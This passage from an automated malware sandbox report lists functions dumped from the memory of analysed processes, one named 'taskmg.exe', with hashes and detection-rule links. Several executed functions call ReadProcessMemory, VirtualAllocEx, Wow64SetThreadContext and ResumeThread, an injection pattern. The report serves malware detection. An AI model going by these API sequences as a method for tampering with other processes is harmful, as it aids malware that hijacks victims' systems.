                                                                                                                • Opcode ID: fffe64b9440886b0d13fec70e2df16ba8fdcef403342f04966d1a41cd22f16c9
                                                                                                                • Instruction ID: 4d0fdb564841424f7adbae6f483e331cc578f8ac5d820fb2cf3ab7470a1c5acc
                                                                                                                • Opcode Fuzzy Hash: fffe64b9440886b0d13fec70e2df16ba8fdcef403342f04966d1a41cd22f16c9
                                                                                                                • Instruction Fuzzy Hash: 654199B4D012589FCF00CFA9D984ADEFBB1BF49314F20942AE819B7200D775AA55CF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002BC0F8, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002BC1AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: aa4c4869f1755a7d4b177372d57282341aa96c1dcfd8ea2b5cfacce435ff3a39
                                                                                                                • Instruction ID: ec5e90d8d85f0a8c2cffd58d366671da75cc8b73c2b2dfea61fabd7c9cc90657
                                                                                                                • Opcode Fuzzy Hash: aa4c4869f1755a7d4b177372d57282341aa96c1dcfd8ea2b5cfacce435ff3a39
                                                                                                                • Instruction Fuzzy Hash: 844199B4D042589FCF14CFA9D884AEEFBB1BF49314F20942AE819B7200D775A955CF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002BBE70, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002BBF1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: e625d3b132900dd2d9fc5f6495530445223fb2632bcc436450233bc971ab82f1
                                                                                                                • Instruction ID: 55494d29eea6aa7d69173ca214198100026be348b5a5c98653a240537e027212
                                                                                                                • Opcode Fuzzy Hash: e625d3b132900dd2d9fc5f6495530445223fb2632bcc436450233bc971ab82f1
                                                                                                                • Instruction Fuzzy Hash: A34188B8D042589BCF14CFA9D884AEEBBB1FF49314F10942AE815BB200D775A955CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002BBD40, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 002BBDEF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: a731bf92e97902276e00afa91fb93289b73e97aec2e9443d1797007262d75ec9
                                                                                                                • Instruction ID: 9abe6a5abeace4266a47917e8f04764b746359d11d32194587ebedc8b832c774
                                                                                                                • Opcode Fuzzy Hash: a731bf92e97902276e00afa91fb93289b73e97aec2e9443d1797007262d75ec9
                                                                                                                • Instruction Fuzzy Hash: FF41ABB4D002599FCF14CFA9D884AEEFBB1BF49314F24842AE419B7240D779AA45CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002BBC50, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 002BBCCE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 451bfa2edf9c81c0a9b8afecfd7e6276b0faaceb66745c3ae1cef3ed0e3cf323
                                                                                                                • Instruction ID: 126a088d07b5f4c83c990b65a248821914cd06f4014ea6abb88494e8ca174c24
                                                                                                                • Opcode Fuzzy Hash: 451bfa2edf9c81c0a9b8afecfd7e6276b0faaceb66745c3ae1cef3ed0e3cf323
                                                                                                                • Instruction Fuzzy Hash: CB31A9B4D002189FCF14CFA9E884ADEFBB4AF49314F14942AE819B7200DB75A905CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF06A6, Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -
                                                                                                                • API String ID: 0-2547889144
                                                                                                                • Opcode ID: 067e7615895e080a51bb2fb73afc2b5da1b8455b859a4230b9459debe9588587
                                                                                                                • Instruction ID: 57f547fa1a53761c1b651ba1a2f606d9a62728558c59410ea9a687466f27fe44
                                                                                                                • Opcode Fuzzy Hash: 067e7615895e080a51bb2fb73afc2b5da1b8455b859a4230b9459debe9588587
                                                                                                                • Instruction Fuzzy Hash: 7F31B575D0422CCFDB64CF64C8447EDBBB0AF05315F6080EA9249A72A2DB758AC4DF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0A1C, Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *
                                                                                                                • API String ID: 0-163128923
                                                                                                                • Opcode ID: 328c49d4b69387d7f46fbb3230b5e355e981c04365c7a246ba69767150c5b278
                                                                                                                • Instruction ID: d23b0a63241fe10680afc0b1e5817a02b24fd32ec4a897ac100fce0b0fd7b440
                                                                                                                • Opcode Fuzzy Hash: 328c49d4b69387d7f46fbb3230b5e355e981c04365c7a246ba69767150c5b278
                                                                                                                • Instruction Fuzzy Hash: 4D31CF7590422CCFDB64CF64C884BEDB7B5AB49311F6080E9D249A7251DB349A85DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0348, Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (
                                                                                                                • API String ID: 0-3887548279
                                                                                                                • Opcode ID: 1dadec774809a5ad790cf29869dd5810c0a3279c2a3c4e6723a5100096bd8ac1
                                                                                                                • Instruction ID: 2ca6408d991ead4e5ac201eed8afb5ee052f15dd9cf260588be93a6e84e22193
                                                                                                                • Opcode Fuzzy Hash: 1dadec774809a5ad790cf29869dd5810c0a3279c2a3c4e6723a5100096bd8ac1
                                                                                                                • Instruction Fuzzy Hash: 2B21EF70D0422C8FDB64DF64C884BECB7B0AF49305F6080E9D208A7251DB349A84DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0048, Relevance: .1, Instructions: 145COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5c75c19f80ce6a697afee7862a52ea7edf7b60677e660535c6921e741fdb0797
                                                                                                                • Instruction ID: 9ecdd1413d042440f4a85e10ef4e2b79ae38764d0f18a33f261e2d9ecebbe861
                                                                                                                • Opcode Fuzzy Hash: 5c75c19f80ce6a697afee7862a52ea7edf7b60677e660535c6921e741fdb0797
                                                                                                                • Instruction Fuzzy Hash: 60511671D4422DCBDB24CF65CC44BE9BBB6AF99300F2081EAD618A7251EB705AC5DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0EE2, Relevance: .1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b654b1da5ab3594dabbad7067ccf341e5343c71e936eede929ea5c3eede20a7
                                                                                                                • Instruction ID: 518bb19c1634a68d4c685bf6082dbdca09202cf3e0f93969b418b3457e740ae7
                                                                                                                • Opcode Fuzzy Hash: 2b654b1da5ab3594dabbad7067ccf341e5343c71e936eede929ea5c3eede20a7
                                                                                                                • Instruction Fuzzy Hash: 9E411771D4421DCEDB60CF64CC80BE9B7B1BF59300F2096EAD219A6251EBB05AC5EF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF00FA, Relevance: .1, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cf4903db9e93b8fa8fae6c555943b768cf318d5933d803c0b744cd8f90cc2e6
                                                                                                                • Instruction ID: bd73c77d520739ee9f9be20ddd78f5a2a33f57f78c04746962ad6c92d4ea553c
                                                                                                                • Opcode Fuzzy Hash: 6cf4903db9e93b8fa8fae6c555943b768cf318d5933d803c0b744cd8f90cc2e6
                                                                                                                • Instruction Fuzzy Hash: AD412671C5021DCACB20CF60CC80BE9B7B1BF99300F2082AAE219A6251EBB05AC5DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF01F8, Relevance: .1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ed394710ba891b4fa33914bc0a720918faaba8387ce77e3e404dc0098ef6f21f
                                                                                                                • Instruction ID: 0d69c7e540581d7c189d7cdf0d3d8f51ee9a5d1fc93e8e55b652b9fc92f6b05c
                                                                                                                • Opcode Fuzzy Hash: ed394710ba891b4fa33914bc0a720918faaba8387ce77e3e404dc0098ef6f21f
                                                                                                                • Instruction Fuzzy Hash: 89410771D5421DCBDB60CF64CC80BE9B7B5BF59300F2086AAE219A6251EBB05AC5DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001CD01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444763952.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9940f9167691f62e480ee8f6ef7a46ed7f0d204db0e7c408b4d5b7b12f1704bb
                                                                                                                • Instruction ID: 27ac31d527be0dce087ab5bfcbcc775e4efeba23c9b3d3b68b28900007aae69c
                                                                                                                • Opcode Fuzzy Hash: 9940f9167691f62e480ee8f6ef7a46ed7f0d204db0e7c408b4d5b7b12f1704bb
                                                                                                                • Instruction Fuzzy Hash: A821F575604244DFCB14DF18E5C4F2ABBA1EB98314F24C5BDE90A4B646C336D817CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001CD006, Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444763952.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a4dd4575e2051c621bcb0810fe96554db967625344f992ec7caa6f45d156541b
                                                                                                                • Instruction ID: 781b5f2c754e728fb110e6d8abc5a4c12b1805b0cedcca9a89ec2690012baa64
                                                                                                                • Opcode Fuzzy Hash: a4dd4575e2051c621bcb0810fe96554db967625344f992ec7caa6f45d156541b
                                                                                                                • Instruction Fuzzy Hash: 6B2180754083809FCB12CF14E994B15BF71EB56314F28C5EAD8498B697C33AD81ACB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BD1C1, Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444741293.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c95f0d46f6c63ea91b7ee7e60b56dfebce031f1156d6702d26bae1518b6dd053
                                                                                                                • Instruction ID: ec93455c54cfad5e2444dc0d7d5943362b2f92ad3aa38e61e5d5dc8993dc2a3e
                                                                                                                • Opcode Fuzzy Hash: c95f0d46f6c63ea91b7ee7e60b56dfebce031f1156d6702d26bae1518b6dd053
                                                                                                                • Instruction Fuzzy Hash: DE01DB314083909AD7584A26EC84BA7BFD8EF55324F19C5AAEE095B582E378DC40C7B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0960, Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d21d617de1c04bc8149336fc5fd2784eb2c00f55137d68ac548ad2f615cc6851
                                                                                                                • Instruction ID: 4955bb7c7289ad33e9c5a473f75ff0dade3a9798bc0db2dfb89cb1c19ef7fbad
                                                                                                                • Opcode Fuzzy Hash: d21d617de1c04bc8149336fc5fd2784eb2c00f55137d68ac548ad2f615cc6851
                                                                                                                • Instruction Fuzzy Hash: A011ED75904228CFDB65DF64C884BECBBB1AF09314F2040E9D249A72A2DB359EC5DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BD1C0, Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444741293.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 949a89bd317c3de6574bde2af256ed1f475cee23295cdbde26a79a227c66e7d6
                                                                                                                • Instruction ID: 5c8fd96121e9c33b2665eba385c3c84425762b6915f32a3655b6ca6c76859778
                                                                                                                • Opcode Fuzzy Hash: 949a89bd317c3de6574bde2af256ed1f475cee23295cdbde26a79a227c66e7d6
                                                                                                                • Instruction Fuzzy Hash: 25F06271404284AEE7148A15D8C4BA6FF98EF51734F18C45AED095B686D3799C44CBB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF03B7, Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 451c30ee7ef8f21d99d17f6ff451c03991fbf4cd37d4b675d4a58ee372c72b78
                                                                                                                • Instruction ID: 4f599e9ad27547246f4b1ad0ae690cf5cccb230a97671d1f344ce99c18b54ea3
                                                                                                                • Opcode Fuzzy Hash: 451c30ee7ef8f21d99d17f6ff451c03991fbf4cd37d4b675d4a58ee372c72b78
                                                                                                                • Instruction Fuzzy Hash: DA01B275901218CFDB64CF54C984BE8B7B5FB48311F2080DAE609E72A1CB35AE81DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF1200, Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 11bffbf502b632e946a388150c0c6842af0ca42277ccdc8b923fa7112c27a4ec
                                                                                                                • Instruction ID: bd4a33f3247ec88bbd003e7f26868651a37b608f8d29014819e3e73b4a6921f2
                                                                                                                • Opcode Fuzzy Hash: 11bffbf502b632e946a388150c0c6842af0ca42277ccdc8b923fa7112c27a4ec
                                                                                                                • Instruction Fuzzy Hash: B0E09A34D4410CEBCB04DFD8D5456ACFBB4EB49315F1081AAD918A7351D631AE42DF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0D37, Relevance: .0, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 988588d8bfaf5c0683630494277e4e36b55c95167264c2472e147beb423ef7b3
                                                                                                                • Instruction ID: 3d09d524aec1f73a7cdd99097283d59b4f583c665ce9cf64b5f851501827183e
                                                                                                                • Opcode Fuzzy Hash: 988588d8bfaf5c0683630494277e4e36b55c95167264c2472e147beb423ef7b3
                                                                                                                • Instruction Fuzzy Hash: 52E0B675A042189FDB54CF94CC91B9CBBB1EB48300F20809A9A08BB391C7325981DF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF1248, Relevance: .0, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fa5407fd81766f43e1248da5df6ae2e4288a94a39d24bb28fb5c0b5de1fec65e
                                                                                                                • Instruction ID: 759c87e4a93f2bfd6e2cf1814d5b933720ca18594ad73e531faa1f73f84356f2
                                                                                                                • Opcode Fuzzy Hash: fa5407fd81766f43e1248da5df6ae2e4288a94a39d24bb28fb5c0b5de1fec65e
                                                                                                                • Instruction Fuzzy Hash: 0DC02B3109E10CC0C41436CC144D7B0724C5B82B05F441C00C70C40433D6106460EDC0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0783, Relevance: .0, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e762257ff68d45538bc3dc45ddb2687627b413252aba3bd64af91702ca2b44a
                                                                                                                • Instruction ID: fd97cd7df9170fa035afdd1ab47877009a2f91a3c60d5f5f5da43dd60f4efbbb
                                                                                                                • Opcode Fuzzy Hash: 8e762257ff68d45538bc3dc45ddb2687627b413252aba3bd64af91702ca2b44a
                                                                                                                • Instruction Fuzzy Hash: 49D092B894122C8ACBA4DF10C84A7D9B6B2AB14300F2080D9852863201CB304A858F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 002B5910, Relevance: 3.9, Strings: 3, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .@'l$@2sl$xWi
                                                                                                                • API String ID: 0-3202194281
                                                                                                                • Opcode ID: 0c4a00dd53b067bc09b99df8459d96db5f38ffe3b4cf60e7029fab8e2b65c017
                                                                                                                • Instruction ID: 29676ad67b3a5e1aad35e3927ae62046edac2cf0558966d56c88bdca1c5106bd
                                                                                                                • Opcode Fuzzy Hash: 0c4a00dd53b067bc09b99df8459d96db5f38ffe3b4cf60e7029fab8e2b65c017
                                                                                                                • Instruction Fuzzy Hash: 6B518E70D116488FC748EFB9E881B9DBBF3ABC9308F05C529D0189BA24EB749D55CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002B5920, Relevance: 3.9, Strings: 3, Instructions: 144COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .@'l$@2sl$xWi
                                                                                                                • API String ID: 0-3202194281
                                                                                                                • Opcode ID: 2336fa997f03df6350e550ccfe761fc554d13fbf4ae36351ea3c733dc74620a4
                                                                                                                • Instruction ID: 258a5fc04b4acda17982ffb8a67cd8f69d9922592e1313719c0714ce8c1f5d95
                                                                                                                • Opcode Fuzzy Hash: 2336fa997f03df6350e550ccfe761fc554d13fbf4ae36351ea3c733dc74620a4
                                                                                                                • Instruction Fuzzy Hash: 0D515F70D116088FD748EFB9E881B9DBBF2AFC9308F05C529D0189BA24EB749D45CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002B5B70, Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: A
                                                                                                                • API String ID: 0-3554254475
                                                                                                                • Opcode ID: 0e957b09bbacefe24e52f7cee4be4febddd72bc3922cc1f11580a1adb324d650
                                                                                                                • Instruction ID: 15148473ebeaf90a71fc82e6816ce7b1844726c575068f576789aee3d283c021
                                                                                                                • Opcode Fuzzy Hash: 0e957b09bbacefe24e52f7cee4be4febddd72bc3922cc1f11580a1adb324d650
                                                                                                                • Instruction Fuzzy Hash: 76416EB1D156588BEB2CCF6B8D4079DFAF7AFC8340F14C1BA850CA6214DB740A818F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012DA2A9, Relevance: .9, Instructions: 896COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445863713.00000000012D2000.00000020.00020000.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.445854168.00000000012D0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.446020481.0000000001390000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                                                                                • Instruction ID: 9da33f7098a4cb5344b211bb01fe4f761efeaf608153b5f8a0e85a8326ae05dc
                                                                                                                • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                                                                                • Instruction Fuzzy Hash: 4062256144F7C19FC7134B74ADB56E2BFB1AE6721871E44CBC4C18F0A3E22A195AD722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: taskmg.exe PID: 2784 Parent PID: 1156 taskmg.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 00589D90, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 976COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: 093a8b8cb0d578fdaab2421a598666b81b13576eec25cf6e72476345a1335a70
                                                                                                                • Instruction ID: 2e642c06430fc998a21566804a78004867321a367c38560f509013b3a5224bff
                                                                                                                • Opcode Fuzzy Hash: 093a8b8cb0d578fdaab2421a598666b81b13576eec25cf6e72476345a1335a70
                                                                                                                • Instruction Fuzzy Hash: 71A23974A00224CFCB69EF24C8586ADBBB6BF88305F5088EAD509A7750DF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589DB1, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 632COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: cf590c7d4b667f76999f4849f6bc84dd469db8c4c1adeb19d0597b9580ff8465
                                                                                                                • Instruction ID: e30223444a17c03d5ee86e9bafb699b5001267f0ca22beed7d1d0b507b1532e8
                                                                                                                • Opcode Fuzzy Hash: cf590c7d4b667f76999f4849f6bc84dd469db8c4c1adeb19d0597b9580ff8465
                                                                                                                • Instruction Fuzzy Hash: FC521974A00224CFCB69EF24C85869CBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589DF6, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 625COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: 33e5cbbb64387f28975766cf9d000b0126e1563d79b7812b262c943130293930
                                                                                                                • Instruction ID: 728a15bed58bff0b6b6b299735c1c42f7901e231f57175f1b54dd39ac11995cd
                                                                                                                • Opcode Fuzzy Hash: 33e5cbbb64387f28975766cf9d000b0126e1563d79b7812b262c943130293930
                                                                                                                • Instruction Fuzzy Hash: AC521874A00224CFCB69EF24C85869CBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589E3B, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 618COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: 7f6fe7902f4b5a071ac9cc19214f16822cd7b9b7df4420997a997d35c10c9f83
                                                                                                                • Instruction ID: 0ed8a3150b76bc94f5e902a12bcd01c7f4418f153d309a058d1def0ff23bcd8d
                                                                                                                • Opcode Fuzzy Hash: 7f6fe7902f4b5a071ac9cc19214f16822cd7b9b7df4420997a997d35c10c9f83
                                                                                                                • Instruction Fuzzy Hash: BF521874A00224CFCB69EF24C85869DBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589E80, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 611COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
